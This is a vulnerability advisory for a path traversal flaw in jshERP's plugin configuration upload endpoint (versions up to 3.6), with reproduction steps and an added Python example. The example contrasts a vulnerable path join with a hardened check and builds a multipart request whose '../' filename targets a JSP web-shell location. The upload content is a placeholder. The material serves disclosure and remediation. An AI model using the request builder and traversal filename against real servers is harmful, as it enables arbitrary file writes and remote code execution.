jishenghua jshERP
cpe:2.3:a:jishenghua:jsherp:*:*:*:*:*:*:*
- <= 3.6
A path traversal vulnerability affects jishenghua jshERP through version 3.6. The flaw is in the PluginController component, in the uploadPluginConfigFile function, which accepts the configFile argument as a MultipartFile. The file is written to disk under a name taken from the uploaded part without neutralising directory-traversal sequences, so a remote attacker controls where the uploaded content is stored.
Exploitation lets the attacker write uploaded content outside the intended plugin configuration directory: into the project directory and, subject to the permissions of the account running jshERP, other locations on the server's file system. If a web shell is written to a location the application server executes from, the result is remote code execution on the host.
To reproduce this vulnerability, send a POST request to the '/jshERP-boot/plugin/uploadPluginConfigFile' endpoint with a multipart/form-data body whose 'configFile' part carries a filename containing directory-traversal sequences (for example '../' components), so that the uploaded file, such as a YAML file, is written outside the plugin configuration directory. Confirm the result by checking where the file lands on the server rather than by the HTTP response alone.
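The following is an added illustration, not code from jshERP or from the advisory. It models the flawed join that the description and reproduction steps above imply (client-supplied multipart filename appended to the plugin directory), the hardened check a fix needs, and the raw multipart body a reproducer would build for the configFile part. The plugin directory path, the assumed write logic and the sample file contents are constructed for the example; only the endpoint and field name come from the advisory.

```python
import posixpath
from typing import Tuple

# Constructed values for illustration; the advisory names neither the
# on-disk plugin directory nor the exact write logic.
PLUGIN_DIR = "/opt/jshERP/plugins"                       # assumed destination
ENDPOINT = "/jshERP-boot/plugin/uploadPluginConfigFile"  # from the advisory
FIELD = "configFile"                                     # from the advisory


def vulnerable_target_path(plugin_dir: str, original_filename: str) -> str:
    """Assumed flawed pattern matching the advisory: the filename of the
    multipart part is joined to the plugin directory as-is, so '../'
    components walk out of it."""
    return posixpath.normpath(posixpath.join(plugin_dir, original_filename))


def safe_target_path(plugin_dir: str, original_filename: str) -> str:
    """Hardened equivalent: drop directory components, allow-list the
    extension the endpoint exists to accept, then verify the resolved
    path still lies under plugin_dir before returning it."""
    # Clients on Windows may send backslash separators; normalise them
    # before taking the basename so 'a\\..\\b' cannot slip through.
    name = posixpath.basename(original_filename.replace("\\", "/"))
    if name in ("", ".", ".."):
        raise ValueError("empty or traversal-only filename")
    if not name.lower().endswith((".yml", ".yaml")):
        raise ValueError("only YAML plugin configuration files are accepted")
    base = posixpath.normpath(plugin_dir)
    target = posixpath.normpath(posixpath.join(base, name))
    if not target.startswith(base + "/"):
        raise ValueError("resolved path escapes the plugin directory")
    return target


def traversal_filename(depth: int, relative_target: str) -> str:
    """Filename an attacker places in the multipart part to climb `depth`
    directories before writing `relative_target`."""
    return "../" * depth + relative_target


def build_multipart(field: str, filename: str, content: bytes,
                    boundary: str = "jshERPrepro") -> Tuple[str, bytes]:
    """Build the Content-Type header value and raw multipart/form-data body
    for a single file part, as a reproducer would before POSTing it."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", head + content + tail


if __name__ == "__main__":
    evil = traversal_filename(2, "webapps/ROOT/shell.jsp")  # constructed target
    print("vulnerable write location:", vulnerable_target_path(PLUGIN_DIR, evil))
    try:
        safe_target_path(PLUGIN_DIR, evil)
    except ValueError as exc:
        print("hardened handler rejects it:", exc)
    ctype, body = build_multipart(FIELD, evil, b"<%-- constructed placeholder --%>")
    print("POST", ENDPOINT, "with Content-Type:", ctype)
    print(body.decode())
```

The hardened function checks the resolved path against the base directory even after taking the basename; that second check costs nothing and catches cases where a later change reintroduces a path component. Whether the endpoint requires authentication is not stated in the advisory, so the example makes no assumption about it.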